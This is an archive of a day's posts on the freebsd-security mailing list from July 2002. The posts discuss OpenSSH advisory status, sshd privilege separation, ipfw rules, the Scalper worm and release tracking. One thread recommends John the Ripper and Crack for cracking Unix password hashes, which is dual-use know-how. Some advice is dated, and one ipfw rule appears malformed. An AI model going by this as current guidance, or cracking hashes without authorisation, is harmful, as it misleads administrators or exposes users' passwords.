(PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 14728 invoked by alias); 2 Jul 2002 11:21:58 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 11:21:58 -0000 Message-ID: <1025608918.14727.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: 
(qmail 14722 invoked from network); 2 Jul 2002 11:21:58 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:58 -0000 Received: (qmail 30479 invoked by alias); 2 Jul 2002 11:17:33 -0000 Received: (qmail 30448 invoked from network); 2 Jul 2002 11:17:30 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:30 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id 97FC857AA for ; Tue, 2 Jul 2002 13:22:57 +0200 (CEST) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". 
From: Christer Söderlund
Date: Tue, 2 Jul 2002 13:22:56 +0200

From owner-freebsd-security Tue Jul 2 5:50:32 2002
From: "Peter Brezny"
Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response
Date: Tue, 2 Jul 2002 08:47:37 -0400

I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the problem listed in CA-2002-18 from CERT.

It doesn't appear so since it's running Openssh_2.9 and http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable.

I _THOUGHT_ I found something on the freebsd site stating that OpenSSH_2.9 FreeBSD localisations 20020307 was not vulnerable, however, I can't find it now.

Since there doesn't appear to be a security advisory or notice from the freebsd security team on this one yet, what's the best thing to do?

Manually update to openssh 3.4? Is an update to the base system in the works?

TIA

Peter Brezny
Skyrunner.net

From owner-freebsd-security Tue Jul 2 5:53:55 2002
To: "Chris McCluskey"
Subject: Re: FW: Which SSH now (and when)?
From: Dag-Erling Smorgrav
Date: 02 Jul 2002 14:53:49 +0200

"Chris McCluskey" writes:
> FreeBSD (4.5) SSH in the system source is (or was) built from
> OpenSSH3.3?

No, OpenSSH 2.9 (OpenBSD version, not "portable" version), which is not vulnerable to the holes reported by ISS.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Jul 2 6: 8:53 2002
Date: Tue, 02 Jul 2002 07:08:16 -0600
To: Colin Faber
From: Brett Glass
Subject: Re: Low-volume list
Cc: Michael Bryan, freebsd-security@FreeBSD.ORG

At 02:25 AM 7/2/2002, Colin Faber wrote:

>What complaints,
>
>The only thing I see on here time after time are complaints about the
>endless stream of bogus posts from you Brett.

Maybe, then, you should quit posting so many complaints? Especially since my postings are NOT bogus, as many folks have told me in private mail.

--Brett

From owner-freebsd-security Tue Jul 2 6:33:29 2002
Date: Tue, 02 Jul 2002 09:33:25 -0400
To: Patrick Cahalan
From: Jeff Palmer
Subject: Re: I'll volunteer
Cc: security@freebsd.org

I'll second this notion, and volunteer as well.

From owner-freebsd-security Tue Jul 2 6:36:15 2002
Date: Tue, 02 Jul 2002 08:36:08 -0500
From: Eric Anderson
To: freebsd-security@freebsd.org
Subject: password crackers?

What does everyone recommend for a general password file cracker? I have been using an old version of crack, but there must be better ones around. I need to crack solaris, freebsd, and linux password hashes. Any recommendations?

Eric

--
------------------------------------------------------------------
Eric Anderson Systems Administrator Centaur Technology
He who laughs last didn't get the joke.
------------------------------------------------------------------

From owner-freebsd-security Tue Jul 2 6:39:12 2002
Date: Tue, 2 Jul 2002 10:38:48 -0300
From: Fernando Schapachnik
To: Eric Anderson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: password crackers?

cat /usr/ports/security/john/pkg-descr

John the Ripper is a UNIX password cracker, currently available for UNIX (tested with Linux x86, FreeBSD x86, Solaris 2.x SPARC, OSF/1 Alpha), DOS, WinNT/Win95.

John the Ripper supports the following cracking modes:
- wordlist with or without rules;
- "single crack", makes use of the login/GECOS information;
- incremental, tries all character combinations;
- external, allows you to define your own cracking mode.
- MD5 based password files support

In a previous message, Eric Anderson wrote:
> What does everyone recommend for a general password file cracker? I have been
> using an old version of crack, but there must be better ones around. I need to
> crack solaris, freebsd, and linux password hashes. Any recommendations?

Lic. Fernando P. Schapachnik
fschapachnik@vianetworks.com.ar

From owner-freebsd-security Tue Jul 2 6:41:41 2002
Date: Tue, 2 Jul 2002 07:41:27 -0600
From: "David G . Andersen"
To: Eric Anderson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: password crackers?

Eric Anderson just mooed:
> What does everyone recommend for a general password file cracker? I have been
> using an old version of crack, but there must be better ones around. I need to
> crack solaris, freebsd, and linux password hashes. Any recommendations?

Single-host: John the Ripper http://www.openwall.com/john/

Multi-host: Probably still Crack. John will be faster on a single host than Crack on two hosts, most likely, but if you've got a host of hosts to throw at it, crack is easier to manage.

-Dave

--
work: dga@lcs.mit.edu me: dga@pobox.com
MIT Laboratory for Computer Science http://www.angio.net/

From owner-freebsd-security Tue Jul 2 7:12:57 2002
Date: Tue, 2 Jul 2002 16:12:50 +0200
From: Buki
To: Peter Brezny
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response

On Tue, Jul 02, 2002 at 08:47:37AM -0400, Peter Brezny wrote:
> I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE
> FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the
> problem listed in CA-2002-18 from CERT.
>
> It doesn't appear so since it's running Openssh_2.9 and
> http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable.
>
>
> I _THOUGHT_ I found something on the freebsd site stating that OpenSSH_2.9
> FreeBSD localisations 20020307 was not vulnerable, however, I can't find it
> now.
>
> Since there doesn't appear to be a security advisory or notice from the
> freebsd security team on this one yet, what's the best thing to do?

the Best Thing(tm) is to stay calm :)

>
> Manually update to openssh 3.4? Is an update to the base system in the
> works?
>

you may either manually upgrade to OpenSSH 3.4 (/usr/ports/security/openssh-portable) or stick with base OpenSSH 2.9 localisation 20020307 as it is secure as many people on this list said before. But YMMV.

> TIA
>
>
> Peter Brezny
> Skyrunner.net

Buki

--
PGP public key: http://dev.null.cz/buki.asc

/"\
\ /  ASCII Ribbon Campaign
 X   Against HTML & Outlook Mail
/ \  http://www.thebackrow.net

From owner-freebsd-security Tue Jul 2 8:36:10 2002
From: "Peter Brezny"
To: "Buki"
Subject: RE: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response
Date: Tue, 2 Jul 2002 11:33:13 -0400

Buki,

Thanks very much for assuaging my fears. I looked through the security list archives for a little while looking for some more on the subject, but didn't come up with anything definitive.

It would be really helpful for the security team to release an official notice letting us know that we're not in deep dodo here. It's particularly scary when the advisories out there say there's a problem, but it's hard to find specific examples of why it's not a problem on freebsd.

If you have any direct refs you could point me to, that would be great.

I also need to update my knowledge of acronyms,...what's YMMV stand for?

Thanks again,

pb

Peter Brezny
Skyrunner.net

-----Original Message-----
From: Buki [mailto:dev@null.cz]
Sent: Tuesday, July 02, 2002 10:13 AM
To: Peter Brezny
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response

On Tue, Jul 02, 2002 at 08:47:37AM -0400, Peter Brezny wrote:
> I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE
> FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the
> problem listed in CA-2002-18 from CERT.
>
> It doesn't appear so since it's running Openssh_2.9 and
> http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable.
>
>
> I _THOUGHT_ I found something on the freebsd site stating that OpenSSH_2.9
> FreeBSD localisations 20020307 was not vulnerable, however, I can't find it
> now.
>
> Since there doesn't appear to be a security advisory or notice from the
> freebsd security team on this one yet, what's the best thing to do?

the Best Thing(tm) is to stay calm :)

>
> Manually update to openssh 3.4? Is an update to the base system in the
> works?
>

you may either manually upgrade to OpenSSH 3.4 (/usr/ports/security/openssh-portable) or stick with base OpenSSH 2.9 localisation 20020307 as it is secure as many people on this list said before. But YMMV.

> TIA
>
>
> Peter Brezny
> Skyrunner.net

Buki

--
PGP public key: http://dev.null.cz/buki.asc

/"\
\ /  ASCII Ribbon Campaign
 X   Against HTML & Outlook Mail
/ \  http://www.thebackrow.net

From owner-freebsd-security Tue Jul 2 8:41:42 2002
From: Mikhail Teterin
To: security@FreeBSD.org, des@FreeBSD.org
Subject: two sshd processes per session?
Date: Tue, 2 Jul 2002 11:41:34 -0400

Hi!

With the privilege separation enabled, there are two sshd processes per each session. If, however, I kill the [priv] one after logging in, the session continues to work properly... Perhaps, the [priv] part should exit by itself? I must be missing something... Thanks!

-mi

From owner-freebsd-security Tue Jul 2 9:12:36 2002
From: "Marcel Dijk"
Subject: Making a firewall more closed
Date: Tue, 2 Jul 2002 18:12:26 +0200

Yes, that works! Thanks very much for your help.

Now I have another problem, I can log in to an FTP site but then I get this message:

227 Entering Passive Mode (212,120,66,212,248,134)
Data Socket Error: Connection Failed

I think I should open ports 1024 - 65535 ? But that would mean a great security risk?

Thanks,

Marcel.

> You forgot about DNS. If you change rule 550 from
> add 550 allow log udp from me to any 21,80 keep-state out
> to
> add 550 allow log udp from me to any 21,53,80 keep-state out
> it should work.
>
> You may want to find out what IPs you use for DNS, and specifically allow
> those addresses.
>
> I loaded your rules and I'm not having any problems now.
>
>
>
> On Monday 01 July 2002 07:05 pm, nascar24 wrote:
> > This is my current ruleset:
> >
> > # allow loopback traffic
> > add 100 allow ip from any to any via lo0
> >
> > # protect loopback address
> > add 200 deny log ip from 127.0.0.1 to any
> > add 249 deny log ip from any to 127.0.0.1
> >
> > # block spoofs
> > add 400 deny log ip from me to any in via ed0
> >
> > # enable NATD
> > add 425 divert 8668 ip from any to any via ed0
> >
> > # check dynamic rules
> > add 450 check-state
> >
> > # make dynamic entries for all outgoing traffic
> > add 500 allow log tcp from me to any 1-65535 keep-state out
> > add 550 allow log udp from me to any 1-65535 keep-state out
> >
> > # services we offer to the world
> > add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in
> >
> > # pass ICMP
> > add 700 allow log icmp from me to any out
> > add 750 allow log icmp from any to me in
> >
> > # pass everything on private LAN
> > add 800 allow log all from 192.168.0.0/16 to any
> > add 850 allow log all from any to 192.168.0.0/16
> >
> > # log rejects that have fallen through
> > add 65000 deny log ip from any to any
> >
> > With this ruleset I can browse websites, FTP sites etc.
> >
> > But when I replace rules 500 and 550 with this:
> >
> > add 500 allow log tcp from me to any 21,80 keep-state out
> > add 550 allow log udp from me to any 21,80 keep-state out
> >
> > I cannot access any websites nor FTP sites. But I guess I had just allowed
> > it?
> >
> > Or is the 'out' the problem here.
> >
> > Marcel.
> >
> > On Monday 01 July 2002 06:45 pm, nascar24 wrote:
> > > What I mean is that I want to grant access to the internet. But only to
> > > ports I 'trust', like 80,21,22 etc. But when I make a rule like:
> > >
> > > add 550 allow ip from me to any 80,21,22
> > >
> > > I cannot access a website, that puzzles me.
> >
> > There is a problem with the rule in the example: You allowed traffic to
> > leave
> > through those ports, but not to enter. We can fix this rule:
> >
> > add 550 allow tcp from me to any 80,21,22 keep-state
> >
> > I noticed you already had a rule 550 - you may want to give it a different
> > number. IPFW (running 4.5R here) gives the following error when trying to
> > load your rule:
> >
> > ipfw: only TCP and UDP protocols are valid with port specifications
> >
> > hence why I changed it from ip to tcp.
> >
> > GL
>
> --
> ----------
> Ramsey G. Brenner
> rgbrenner@myrealbox.com
> http://rgbrenner.cjb.net/

From owner-freebsd-security Tue Jul 2 9:24: 0 2002
Date: Tue, 02 Jul 2002 09:23:54 -0700
From: Jason DiCioccio
To: Jeff Palmer, Patrick Cahalan
Cc: security@freebsd.org
Subject: Re: I'll volunteer

--On Tuesday, July 2, 2002 9:33 AM -0400 Jeff Palmer wrote:

> I'll second this notion, and volunteer as well.

What separates this list from BUGTRAQ is the fact that it is unmoderated IMHO.
It is also dealing with FreeBSD security specifically, however the fact that it's unmoderated makes it really useful in my book. I don't mind and do think that many times, there are useful arguments made in some of these long threads. Brett Glass makes some valid points as well, imho. I'm sure I'm not the only one who feels that way, but not everyone wants to admit it :)..

The fact that this list is unmoderated usually means that I get my information quicker from this list than I do from bugtraq, and that is important to me and to others I'm sure. I don't have to wait for a list moderator to approve an important post. I also don't have to worry about a bias that the list moderator might have which would prevent an important post from making the list.

This list goes off topic sometimes, but it's easy enough to ignore a thread. Perhaps one of these camps should start its own list, whether it's @freebsd.org or not. But I personally enjoy having an unmoderated source for security information and discussion, even if it's off topic once in a while. I hope these ramblings made some sense.

Cheers,
-JD-

--
Jason DiCioccio - jd@bluenugget.net - Useless .sig
Open Domain Service - geniusj@ods.org - http://www.ods.org/
Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/

PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08

From owner-freebsd-security Tue Jul 2 9:26:39 2002
Date: Tue, 2 Jul 2002 12:26:16 -0400 (EDT)
From: David Miller
To: Andy Farkas
Cc: Kent Stewart, security@FreeBSD.ORG
Subject: Re: FreeBSD.Scalper.Worm

On Sun, 30 Jun 2002, Andy Farkas wrote:

> On Sat, 29 Jun 2002, Kent Stewart wrote:
>
> > One of the people sending mail to -docs, pointed me to
> >
> > http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
> >
> > It looks like more exposure needs to be provided via the web site and etc.
> >
> > Kent
> >
> > --
> > Kent Stewart
> > Richland, WA
> >
> > http://users.owt.com/kstewart/index.html
> >
>
> Looks like this worm can be stopped by having /tmp mounted noexec.

Probably not a very good solution since it could be overcome with a
trivial change to the worm. The better fix is to plug the hole:)

--- David

From owner-freebsd-security Tue Jul 2 14:13:15 2002
Date: Wed, 3 Jul 2002 02:52:56 +0930
Subject: Re: security fixes
From: Wincent Colaiuta
To: freebsd-security@freebsd.org

On Tuesday, 2 July, 2002, at 05:37 AM, Kevin Kinsey, DaleCo, S.P. wrote:

> Some people read the warning about -STABLE in
> the Handbook (that I quoted earlier) and decide only
> to run -RELEASE and patch security fixes, and
> there is a cvs tag for this, called RELENG_4_x.
> This is where a little confusion comes in, because
> after a while they quit patching the older releases.

So on production systems track RELENG_4_6 now, and when that stops being
updated, start tracking RELENG_4_7, and so on.... I can't see any
problems with that. That way you're tracking the security fixes and
critical patches, and then when you need to you're upgrading your entire
system in a safe way.

I think the advice to not track STABLE on production machines is good.
Sure, STABLE is mostly exactly that: STABLE. But there are always going
to be exceptions... The last thing you want is a machine that won't boot
after something went wrong and you have to pay $$$ to get access to the
datacentre and rescue the machine...

Cheers
Wincent

From owner-freebsd-security Tue Jul 2 14:14:18 2002
From: "Peter Brezny"
Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response
Date: Tue, 2 Jul 2002 12:44:36 -0400

OK, so now that half the freebsd-security list has enlightened me as to
what YMMV means and where it came from, I know you guys are reading this
list, however, no one bothered to mention why even though openssh's
statement says that freebsd has a problem with the version of ssh out
there, FreeBSD actually doesn't.

Could someone please point me to a specific ref. as to why freebsd's
implementation of ssh is ok? I know I'm paranoid. Thanks.

From: http://openssh.org/txt/preauth.adv

2. Impact:

This bug can be exploited remotely if ChallengeResponseAuthentication is
enabled in sshd_config. This option is enabled by default on OpenBSD and
other systems.

Affected are at least systems supporting s/key over SSH protocol version
2 (OpenBSD, FreeBSD and NetBSD as well as other systems supporting s/key
with SSH). Exploitability of systems using PAMAuthenticationViaKbdInt has
not been verified.

Thanks for the help and the enlightening reasons of what YMMV means,

Here's a good one

Your Memory Might Vanish :) (it's: Your Mileage May Vary)

And another with a nice explanation.

YMMV = "your mileage may vary"
A statement often made in advertising by American automobile
manufacturers stating that fuel economy in miles/gallon is variable
according to driving habits, type of fuel, etc., etc., This has come to
mean "I found this to be true, but you may not..."

Thanks again for your help guys!

Peter Brezny
Skyrunner.net

From owner-freebsd-security Tue Jul 2 14:40:21 2002
To: Mikhail Teterin
Cc: security@FreeBSD.org
Subject: Re: two sshd processes per session?
From: Dag-Erling Smorgrav
Date: 02 Jul 2002 23:39:30 +0200

Mikhail Teterin writes:
> With the privilege separation enabled, there are two sshd processes per
> each session. If, however, I kill the [priv] one after logging in, the
> session continues to work properly... Perhaps, the [priv] part should
> exit by itself? I must be missing something...

If you kill the monitor, you won't be able to do stuff like connect to
forwarded ports etc., and your session might not be properly shut down
after you disconnect.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Jul 2 15:17:17 2002
Date: Tue, 02 Jul 2002 16:06:13 -0600
To: Wincent Colaiuta, freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: security fixes

At 11:22 AM 7/2/2002, Wincent Colaiuta wrote:

>So on production systems track RELENG_4_6 now, and when that stops being updated, start tracking RELENG_4_7, and so on....

With the flurry of changes going on (including the OpenSSH hole and libc
hole in the base install and the Apache vulnerability in the ports and
packages), it'd be nice to see an interim release. Who here would be in
favor of that?
Who, on the FreeBSD Core Team, might make the decision to do an interim
release before 4.7 (scheduled for October)? (Yes, it takes work to put
out a release, but do we really want everyone who wants a secure system
to have to install from -STABLE snapshots, running the risk of picking a
bad day, for four months?)

--Brett Glass

From owner-freebsd-security Tue Jul 2 15:29:58 2002
From: Mikhail Teterin
Organization: Virtual Estates, Inc.
To: Dag-Erling Smorgrav
Subject: Re: two sshd processes per session?
Date: Tue, 2 Jul 2002 18:29:44 -0400
Cc: security@FreeBSD.org

On Tuesday 02 July 2002 05:39 pm, Dag-Erling Smorgrav wrote:
= Mikhail Teterin writes:
= > With the privilege separation enabled, there are two sshd processes per
= > each session. If, however, I kill the [priv] one after logging in, the
= > session continues to work properly... Perhaps, the [priv] part should
= > exit by itself? I must be missing something...
=
= If you kill the monitor, you won't be able to do stuff like connect to
= forwarded ports etc.,

I just verified, that forwarded ports continue to work -- both the -L
and the -R ones.

= and your session might not be properly shut down after you disconnect.

What exactly will break? At least, the w(1)'s output is correct after
the disconnection -- shell is responsible for that. What else?

Thanks!

-mi

From owner-freebsd-security Tue Jul 2 15:41:33 2002
To: Mikhail Teterin
Cc: security@FreeBSD.org
Subject: Re: two sshd processes per session?
From: Dag-Erling Smorgrav
Date: 03 Jul 2002 00:41:27 +0200

Mikhail Teterin writes:
> What exactly will break? At least, the w(1)'s output is correct after
> the disconnection -- shell is responsible for that. What else?

pam_close_session() will not run, for one. This could mean for
instance that locally cached copies of Kerberos tickets you obtained
when you logged in won't be removed. I'm not sure that's a security
risk, but it could fill up your /tmp after a while.

Also, protocol version 2 allows multiple ptys per connection (i.e.
you can connect to an ssh server and open a shell, then later open a
second shell through the same TCP connection). OpenSSH's ssh client
doesn't support this, but many other clients do (PuTTY, for instance),
and the OpenSSH server does. If you try to do this after having
killed the monitor, not only will you not get a second shell but the
unprivileged process will probably (I haven't checked the source) log
an error and abort, killing your first shell and any tunneled
connections you might have.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Jul 2 16: 0:47 2002
Date: Tue, 2 Jul 2002 16:00:34 -0700 (PDT)
From: twig les
Subject: Re: security fixes
To: Brett Glass, Wincent Colaiuta, freebsd-security@FreeBSD.ORG

Absolute agreement.

--- Brett Glass wrote:
> At 11:22 AM 7/2/2002, Wincent Colaiuta wrote:
>
> >So on production systems track RELENG_4_6 now, and
> when that stops being updated, start tracking
> RELENG_4_7, and so on....
>
> With the flurry of changes going on (including the OpenSSH hole and libc
> hole in the base install and the Apache vulnerability in the ports and
> packages), it'd be nice to see an interim release. Who here would be
> in favor of that? Who, on the FreeBSD Core Team, might make the decision
> to do an interim release before 4.7 (scheduled for October)? (Yes, it
> takes work to put out a release, but do we really want everyone who wants
> a secure system to have to install from -STABLE snapshots, running the
> risk of picking a bad day, for four months?)
>
> --Brett Glass

=====
-----------------------------------------------------------
All warfare is based on deception.
-----------------------------------------------------------

From owner-freebsd-security Tue Jul 2 16: 1: 3 2002
From: "Kevin Kinsey, DaleCo, S.P."
To: "Wincent Colaiuta"
Subject: Re: security fixes
Date: Tue, 2 Jul 2002 18:00:25 -0500

----- Original Message -----
From: "Wincent Colaiuta"
Sent: Tuesday, July 02, 2002 12:22 PM
Subject: Re: security fixes

On Tuesday, 2 July, 2002, at 05:37 AM, Kevin Kinsey, DaleCo, S.P. wrote:

> Some people read the warning about -STABLE in
> the Handbook (that I quoted earlier) and decide only
> to run -RELEASE and patch security fixes, and
> there is a cvs tag for this, called RELENG_4_x.
> This is where a little confusion comes in, because
> after a while they quit patching the older releases.

]So on production systems track RELENG_4_6 now, and when that stops being
]updated, start tracking RELENG_4_7, and so on.... I can't see any
]problems with that. That way you're tracking the security fixes and
]critical patches, and then when you need to you're upgrading your entire
]system in a safe way.
]
]I think the advice to not track STABLE on production machines is good.
]Sure, STABLE is mostly exactly that: STABLE. But there are always going
]to be exceptions... The last thing you want is a machine that won't boot
]after something went wrong and you have to pay $$$ to get access to the
]datacentre and rescue the machine...
]
]Cheers
]Wincent

Nothing wrong with your advice either. Although in my world, if anyone's
server quits responding, I've got a red carpet straight to the box as
soon as I can get there...
I'm in the 'small' world, though; to each his own....Wincent, are you in
any way related to a famous drummer?

Kevin Kinsey

From owner-freebsd-security Tue Jul 2 16:26: 6 2002
Date: Tue, 2 Jul 2002 19:25:56 -0400 (EDT)
From: Chris BeHanna
To: FreeBSD Security
Subject: Re: security fixes

On Tue, 2 Jul 2002, twig les wrote:

> Absolute agreement.

OK, then. Ante up, say, $7000 apiece to get two people working on
this full-time, and you might get 4.6.1 in six weeks.[1]

As an alternative, for your customers, you might build a custom
release from a known working snapshot of -STABLE that you've tested
the bejeezus out of.

> --- Brett Glass wrote:
> > At 11:22 AM 7/2/2002, Wincent Colaiuta wrote:
> >
> > >So on production systems track RELENG_4_6 now, and
> > when that stops being updated, start tracking
> > RELENG_4_7, and so on....
> >
> > With the flurry of changes going on (including the OpenSSH hole
> > and libc hole in the base install and the Apache vulnerability in
> > the ports and packages), it'd be nice to see an interim release.
> > Who here would be in favor of that? Who, on the FreeBSD Core Team,
> > might make the decision to do an interim release before 4.7
> > (scheduled for October)? (Yes, it takes work to put out a release,
> > but do we really want everyone who wants a secure system to have
> > to install from -STABLE snapshots, running the risk of picking a
> > bad day, for four months?)

--
Chris BeHanna                              http://www.pennasoft.com
Principal Consultant
PennaSoft Corporation                      chris@pennasoft.com

[1] I am neither a committer, nor a member of core, nor a member of
    the RE team.[2] I can't make this commitment on their behalf. I
    wrote this to illustrate to you what kind of effort is involved,
    and what kind of time frame is involved.[3][4]

[2] I was the RE at my last job. I know firsthand that it ain't just
    turning a crank on a CVS snapshot to get a release.

[3] Unless the FreeBSD Project is willing to postpone or drop
    5.0-DP2, which I highly doubt, or to postpone or drop 5.0-RELEASE,
    which I highly doubt, or to postpone or drop 4.7-RELEASE, which I
    highly doubt. There's too much going on in this *volunteer*
    project to cater to everyone's whim, desire, or hobby horse.

[4] The effort to put some of these changes into RELENG_4_6 is
    somewhat less, but still nontrivial and, again, it's not my call.
    It's far more likely to happen if you offer to do some or all of
    the work.

From owner-freebsd-security Tue Jul 2 16:37:20 2002
From: "Stefan Dens"
To: "Steve McGhee"
Subject: Re: [Snort-users] instant snort sigs for new vulnerabilites
Date: Wed, 3 Jul 2002 01:42:13 +0200

Hi,

Well, you can do that with snortcenter, you can adjust rules to your own
network setting and update them from the internet without changing your
own configuration. The only problem is that snortcenter needs built-in
user authentication, if you want to run it from a cron job with lynx or
wget. I will make an option to disable it for auto-update.
http://users.pandora.be/larc

(Just a remark: if too many people are going to use some sort of
auto-update utility to fetch the snortrules from the snort website, I
guess their bandwidth will be gone. And I know that there is a checksum
for the snortrules file, but it seems to change every hour without there
being a change to the rules.)

Stefan Dens

----- Original Message -----
From: "Steve McGhee"
Sent: Monday, July 01, 2002 10:57 PM
Subject: [Snort-users] instant snort sigs for new vulnerabilites

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
>
> with all the fuss lately over the new apache worm, etc, id like to know
> if my machine is getting hit (its patched, just being curious). i know
> about mod_blowchunks, but im looking for something more general..
>
> it seems to me that snort could see these attacks pretty easily.
>
> is there a tool/method out there that will retrieve the *latest* snort
> signatures automatically? for those of us not running snort via CVS, id
> like a way to do something like cvsup, but _only_ update my ruleset
> every night or whatever.
>
> i cc: the freebsd team as this might be a cool (simple) port. (something
> like /usr/ports/security/snort-signatures)
>
> this could be helpful to people who are just curious, or maybe could
> provide some good numbers to shock lazy sysadmins into actually patching
> their machines.
>
>
> ..of course, this is all assuming there's someone out there writing
> signatures ;)
>
> - --
> - -steve
>
> ~ ..........................................................
> ~ Steve McGhee
> ~ Systems Administrator
> ~ Linguistic Minority Research Institute
> ~ UC Santa Barbara
> ~ phone: (805)893-2683
> ~ email: stevem@lmri.ucsb.edu
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 6.5.8
> Comment: Using PGP with Mozilla - http://enigmail.mozdev.org
>
> iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns
> BcxrxnUpvAJK3Sczy5nY4Ir5
> =9LCO
> -----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jul 2 16:51:49 2002
Date: Tue, 2 Jul 2002 16:51:44 -0700 (PDT)
From: twig les
Subject: Re: security fixes
To: Chris BeHanna, FreeBSD Security

Yak yak yak. Someone asked who thought it was a good idea and I did.
Deal with it.

> Chris BeHanna                              http://www.pennasoft.com
> Principal Consultant
> PennaSoft Corporation                      chris@pennasoft.com
>
> [1] I am neither a committer, nor a member of core, nor a member of
>     the RE team.[2] I can't make this commitment on their behalf. I
>     wrote this to illustrate to you what kind of effort is involved,
>     and what kind of time frame is involved.[3][4]
>
> [2] I was the RE at my last job. I know firsthand that it ain't just
>     turning a crank on a CVS snapshot to get a release.
>
> [3] Unless the FreeBSD Project is willing to postpone or drop
>     5.0-DP2, which I highly doubt, or to postpone or drop 5.0-RELEASE,
>     which I highly doubt, or to postpone or drop 4.7-RELEASE, which I
>     highly doubt. There's too much going on in this *volunteer*
>     project to cater to everyone's whim, desire, or hobby horse.
>
> [4] The effort to put some of these changes into RELENG_4_6 is
>     somewhat less, but still nontrivial and, again, it's not my call.
>     It's far more likely to happen if you offer to do some or all of
>     the work.

=====
-----------------------------------------------------------
All warfare is based on deception.
-----------------------------------------------------------

From owner-freebsd-security Tue Jul 2 17:33:37 2002
From: "getsubmail"
To: "Marcel Dijk"
Subject: RE: Making a firewall more closed
Date: Tue, 2 Jul 2002 20:33:22 -0400

In passive ftp, the client (your computer) initiates a second connection
to a high port, that the server specifies, for data upload/download.
Such a high port (ephemeral port) could be 1024-5000 inclusive for MS IIS
default, or it could be 49152-65535 for Free/OpenBSD default, or it could
be in any port range that the ftp site owner is pleased to choose.

So, to allow passive ftp, you would need to

add 500 allow log ftp from me to any 1024-65535 keep-state out

The primary purpose of having a firewall is to protect your
computer/network from outside intrusion. Sometimes companies, for
internal security reasons, would block outgoing connections too. In your
case, allowing outgoing connections might NOT be a security risk.

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Marcel Dijk
> Sent: July 2, 2002 12:12 PM
> To: security@FreeBSD.ORG
> Subject: Making a firewall more closed
>
>
> Yes, that works! Thanks very much for your help.
>
> Now I have another problem, I can log in to an FTP site but then
> I get this message:
>
> 227 Entering Passive Mode (212,120,66,212,248,134)
> Data Socket Error: Connection Failed
>
> I think I should open ports 1024 - 65535 ? But that would mean a great
> security risk?
>
> Thanks,
>
> Marcel.
>
>
> > You forgot about DNS. If you change rule 550 from
> > add 550 allow log udp from me to any 21,80 keep-state out
> > to
> > add 550 allow log udp from me to any 21,53,80 keep-state out
> > it should work.
> >
> > You may want to find out what IPs you use for DNS, and specifically allow
> > those addresses.
> >
> > I loaded your rules and im not having any problems now.
> >
> >
> >
> > On Monday 01 July 2002 07:05 pm, nascar24 wrote:
> > > This is my current ruleset:
> > >
> > > # allow loopback traffic
> > > add 100 allow ip from any to any via lo0
> > >
> > > # protect loopback address
> > > add 200 deny log ip from 127.0.0.1 to any
> > > add 249 deny log ip from any to 127.0.0.1
> > >
> > > # block spoofs
> > > add 400 deny log ip from me to any in via ed0
> > >
> > > # enable NATD
> > > add 425 divert 8668 ip from any to any via ed0
> > >
> > > # check dynamic rules
> > > add 450 check-state
> > >
